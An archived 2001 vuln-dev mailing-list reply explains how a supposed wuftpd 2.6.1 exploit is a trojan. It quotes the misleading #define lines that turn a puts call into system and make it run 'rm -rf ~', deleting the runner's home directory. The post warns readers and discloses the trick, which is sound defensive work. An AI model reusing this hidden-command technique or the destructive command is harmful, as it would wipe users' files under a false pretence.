Re[2]: wuftpd 2.6.1 advisory/exploit
From: Alexander Ryumshin (mizi@alkar.net)Date: 09/20/01
- Previous message: Bernhard Rosenkraenzer: "Re: wuftpd 2.6.1 advisory/exploit"
- In reply to: Blue Boar: "Re: wuftpd 2.6.1 advisory/exploit"
- Next in thread: Matias Sedalo: "Re: wuftpd 2.6.1 advisory/exploit"
- Next in thread: Pedro Miller Rabinovitch: "WARNING! Fake exploit (was: wuftpd 2.6.1 advisory/exploit)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Thu, 20 Sep 2001 15:55:14 +0300 From: Alexander Ryumshin <mizi@alkar.net> Message-ID: <18897013427.20010920155514@alkar.net> To: vuln-dev@securityfocus.com Subject: Re[2]: wuftpd 2.6.1 advisory/exploit
Hello,
Yes, the trick is here:
//#define POTS 12 /* fill these in for your
#define DEF_ALGN 1 * target system
//#define HEAP_ADDR 0x41414141 */
...
#define target (unsigned long)
...
unsigned long arg_addr = ADDR, align = DEF_ALGN,
After preprocessing the code looks like
unsigned long arg_addr = 0x08049588, align = 1 * (unsigned long) system;
Then puts' address is being replaced by system's or something like
that and then puts("rm -rf is not elite ~"); does the main trick :)
Hint: ~ means your home directory.
Wednesday, September 19, 2001, 6:38:14 PM, you wrote:
BB> Hey, I'm told that this exploit like eats your hard drive or something.
BB> Caveat emptor and all, but I figured since I actually heard about this,
BB> I'd let you know. I guess it's a spoofed note.
BB> BB
-- Best regards, Alexander ISP Alkar Teleport tel/fax +380 562 340044 mailto:mizi@alkar.net http://abn.com.ua http://ufa.com.ua
- Previous message: Bernhard Rosenkraenzer: "Re: wuftpd 2.6.1 advisory/exploit"
- In reply to: Blue Boar: "Re: wuftpd 2.6.1 advisory/exploit"
- Next in thread: Matias Sedalo: "Re: wuftpd 2.6.1 advisory/exploit"
- Next in thread: Pedro Miller Rabinovitch: "WARNING! Fake exploit (was: wuftpd 2.6.1 advisory/exploit)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
